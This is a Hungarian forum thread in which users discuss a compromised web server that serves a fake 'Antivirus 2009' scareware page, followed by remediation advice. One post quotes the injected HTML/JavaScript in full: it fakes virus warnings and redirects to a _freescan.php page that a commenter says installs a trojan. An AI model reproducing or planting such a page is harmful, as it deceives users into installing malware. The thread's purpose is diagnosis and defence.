Hírek:

Fontos tudnivalók a migrációval kapcsolatban, kérlek olvasd el:

A régi fórumról áthozott hozzászólásoknál a felhasználó neve adatvédelmi megfontolásokból véletlenszerűen generált értékekre lett  lecserélve. Ez akkor tud a valódi értékre visszaállni, ha az adott felhasználó a régi fórumon nyilatkozik, hogy beleegyezik az adatainak az új fórumra továbbításához, majd ezután itt a régi felhasználónevével és email címével regisztrál.
8~20 óra között, 1~30 percen belül megtörténik a jóváhagyás, 30 percenként ellenőrizd email fiókodat (SPAM-ot is) mindenképp kapsz mail-t, a sikeres regisztrácioról, vagy a hibáról és, hogy mi a teendőd.
Nézd meg  "A régi fórumról, az új fórumra költözés útmutatót."
A régi fórumon használt email címmel de más felhasználói azonosítóval érkező regisztrációs kérelmek törlésre kerűlnek.

Main Menu

Linkek

Indította gaben, 2024 április 10, 13:42

Előző téma - Következő téma

airfoil6205

Ha jól emlékszem a szerver linuxos. Amúgy csak erre az egy könyvtárra terjed ki a fertőzés, ha úgy mentek belőle, hogy "Hivatkozás mentése más néven" akkor egy freescan.php filenevet jelenít meg és ez csinálja a palávert de nem tudom, hogyan lehetne elkapni.

airfoil6205

<html>

<body>

<script src='window.js'></script>

<script>

fdfsdfsdd('x:'+window.screen.width/2+' y:'+(window.screen.height/2-30), 'w:1; h:1');  

is_XP_SP2     = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));

is_IE=false;

if (navigator.appName.toLowerCase()=='microsoft internet explorer'){

if (navigator.userAgent.toLowerCase().indexOf('opera')<=0)  { is_IE=true; }

}  

if(confirm('ATTENTION! If your computer is struck by the spyware, you could suffer data loss, erratic PC behaviour, PC freezes and creahes.

Detect and remove viruses before they damage your computer!
Antivirus 2009 will perform a 100% FREE and quick scan  of your computer for Viruses, Spyware and Adware.

Do you want to install Antivirus 2009 to scan your computer for malware now? (Recommended)'))

{

alert('Antivirus 2009 will scan your system for threats now.

Please select "RUN" or "OPEN" when prompted to start the installation.

This file has been digitally signed and independently certified as 100% free of spyware, adware and viruses.');

};

fdfsdfsdd('x:0; y:0', 'w:' + window.screen.width + ' h:' + window.screen.height);  

window.resizeTo(window.screen.width, window.screen.height);

window.open('_freescan.php?nu=880147', '_self');

window.focus();

</script>

</body>

</html>

4um5b65d

És ehhez a forráshoz ki fér hozzá?

HJózsi

Pl Te is, :)  jobb egér gomb, forráskód ... Operában legalábbis így ...

4um5b65d

auuuuu, ez fájdalmas volt..... :))))
Úgy gondoltam szerkesztési funkciót tekintve ki fér hozzá?????
Mert ha én akkor törlök...... :))))

HJózsi

Ez még fájdalmasabb : a rendszergazda ... :DD  
... :( sajnos ... a webszerverbe települt be

airfoil6205

De miért csak erre az egy könyvtárra terjed ki?

4um5b65d

Hát mert csak az adott jpg megjelenítés-hez ékelték be ez a html file-t. De nem csinál ez semmi különös bajt csak rád erőltetik a saját kis vírus-scanner programjukat. A keresés az ingyenes, aztán meg biztos talál valamit a gépeden és akkor jön a betojás a nadrágba, aztán valakik ezek után megvásárolják a nem létező vírus miatt a vírusirtót, aztán az meg jól kiirtja azt ami nem is volt, de ekkor már a pénzed náluk landolt.

airfoil6205

Ubuntu 8.10 [#wink]

4um5b65d

MIt tegyek vele???? Mond és megteszem :))))

HJózsi

Aha, jó kérdés,...  az idézett html kód tartalmazza a huncutságot, viszont a html lehet a szerver által generált is ... a php lapot viszont biztos, hogy a szerver futtatja meg ...

dg8n4i8x

Ez a könyvtárban lévő összes jpg kiterjesztésű fájlokkal indul? Átnevezés nem segít?

sasi

A vírus, mely a frre antivirus programot ajánl fel, olyan weblapot nyit meg, melynek a freecan.php lapja azonnal telepíti az Agend-DE[Trj] trójait.  
A felajánlott ingyenes antivírus program szintén trójai, csak „sokkal hatékonyabb” mint az előző. Telepítés után imitált víruskeresést futtat, „talál is”, hogy ne fogj gyanút!
A kéretlenül tolakodó vírusirtók mind ilyenek.

Hatásos védelmet biztosít Avast nevű, magyarul is tudó, otthoni használatra ingyenes program.

http://www.avast.com/" TARGET=_fnew>Innen tölthető le.

4um5b65d

Én azt csináltam egy ilyen esetben amikor nem tudtam mit kezdeni a gépemre települt szeméttel, hogy van a Windowsnak egy szolgáltatása amivel vissza lehet állítani egy a huncutságot megelőző állapotot, és ez nem érinti az azóta keletkezett dokumentumokat...stb...

sasi

Alábecsülöd a vírusírók tudását!
A rendszer visszaállítási szolgáltatás nem jelent gyógyírt a vírusokkal, trójaiikkal szemben, mert ezek a memóriában vannak, és fizikailag is a merevlemezen maradnak, azaz biztosított a fertőzés továbbélése.
Ha segítene a rendszer visszaállítás, nem lenne szükség vírusirtó programokra!
Nálad Bill huncutsága okozhatott galibát, nem vírus.